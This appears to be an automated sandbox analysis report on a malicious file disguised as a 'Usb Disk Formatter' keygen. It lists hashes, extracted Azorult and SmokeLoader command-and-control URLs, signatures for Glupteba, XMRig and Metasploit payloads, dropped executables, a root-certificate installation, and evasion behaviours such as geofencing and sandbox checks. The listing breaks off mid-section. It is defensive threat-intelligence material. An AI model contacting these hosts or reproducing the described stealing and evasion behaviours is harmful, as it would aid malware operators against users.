Analysis
-
max time kernel
110s -
max time network
302s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 11:41
Static task
static1
Behavioral task
behavioral1
Sample
Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe
Resource
win10v20201028
General
-
Target
Usb_Disk_Formatter_3_2_5_keygen_by_KeygenNinja.exe
-
Size
5.2MB
-
MD5
ca3728b14865976c4f39d4b1dd058d4b
-
SHA1
41f57c0b052b0ac3a276463f6c09085efb049153
-
SHA256
829a3cefee8046496eb6bc03b2009891bec987a01ebe652bacc42292cf892418
-
SHA512
eabceb4164f54c8332da402ec6f5b91776dedc1b2a4ea1491217a3fed1d4f54bde5863605cbec7910f04f4265a2a9ae8b6dd95aad0ba3dba1ec6a0a26ee217e9
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/4076-198-0x0000000002570000-0x0000000002E7A000-memory.dmp family_glupteba behavioral2/memory/4076-200-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/4076-202-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/4060-145-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/4060-170-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/4060-154-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/4060-222-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 10 IoCs
pid Process 1056 keygen-pr.exe 1120 keygen-step-1.exe 1312 keygen-step-3.exe 4572 keygen-step-4.exe 2156 key.exe 2404 Setup.exe 4268 multitimer.exe 196 setups.exe 4636 askinstall20.exe 1988 setups.tmp -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 1988 setups.tmp 1988 setups.tmp 1988 setups.tmp 1988 setups.tmp 1988 setups.tmp 1988 setups.tmp 1988 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 156 ipinfo.io 236 ip-api.com 360 ipinfo.io 368 ipinfo.io 154 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum 1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 1.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
pid pid_target Process procid_target 6128 5652 WerFault.exe 147 10180 1064 WerFault.exe 150 10608 1064 WerFault.exe 150 10896 1064 WerFault.exe 150 6896 1064 WerFault.exe 150 7464 1064 WerFault.exe 150 6636 1064 WerFault.exe 150 4388 1064 WerFault.exe 150 9404 1064 WerFault.exe 150 6304 1064 WerFault.exe 150 -
Delays execution with timeout.exe 2 IoCs
pid Process 5288 timeout.exe 4896 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS 1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer 1.exe -
Kills process with taskkill 3 IoCs
pid Process 4248 taskkill.exe 3600 taskkill.exe 10564 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000002b6d19d843c35a80c5dcb9e4cc3ba3475b1b8338a788ff7bd01c660654cc0e63d2792f2a483d6d8bfd8e041a75c6de94e89cbcb85aa5c8384ae7ccb8790d60a90fd7b2f750c4bb20c3190fcb05b3759af98fa44de2ada44c923e MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 39118b364829d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4234d0364829d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{09FB41C2-A18F-4B5B-98C6-5DFD1DE30851}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000074ebc62166acb83396f5fc77197613aa7ce0958f5add6cc2b332bd3ba94e7c26bda69e7d8d9ac89f18cb8739f56186a204cb70d876f2dc8a8926 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 5964 PING.EXE 5360 PING.EXE 4676 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 155 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 162 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 365 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 373 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 11 IoCs
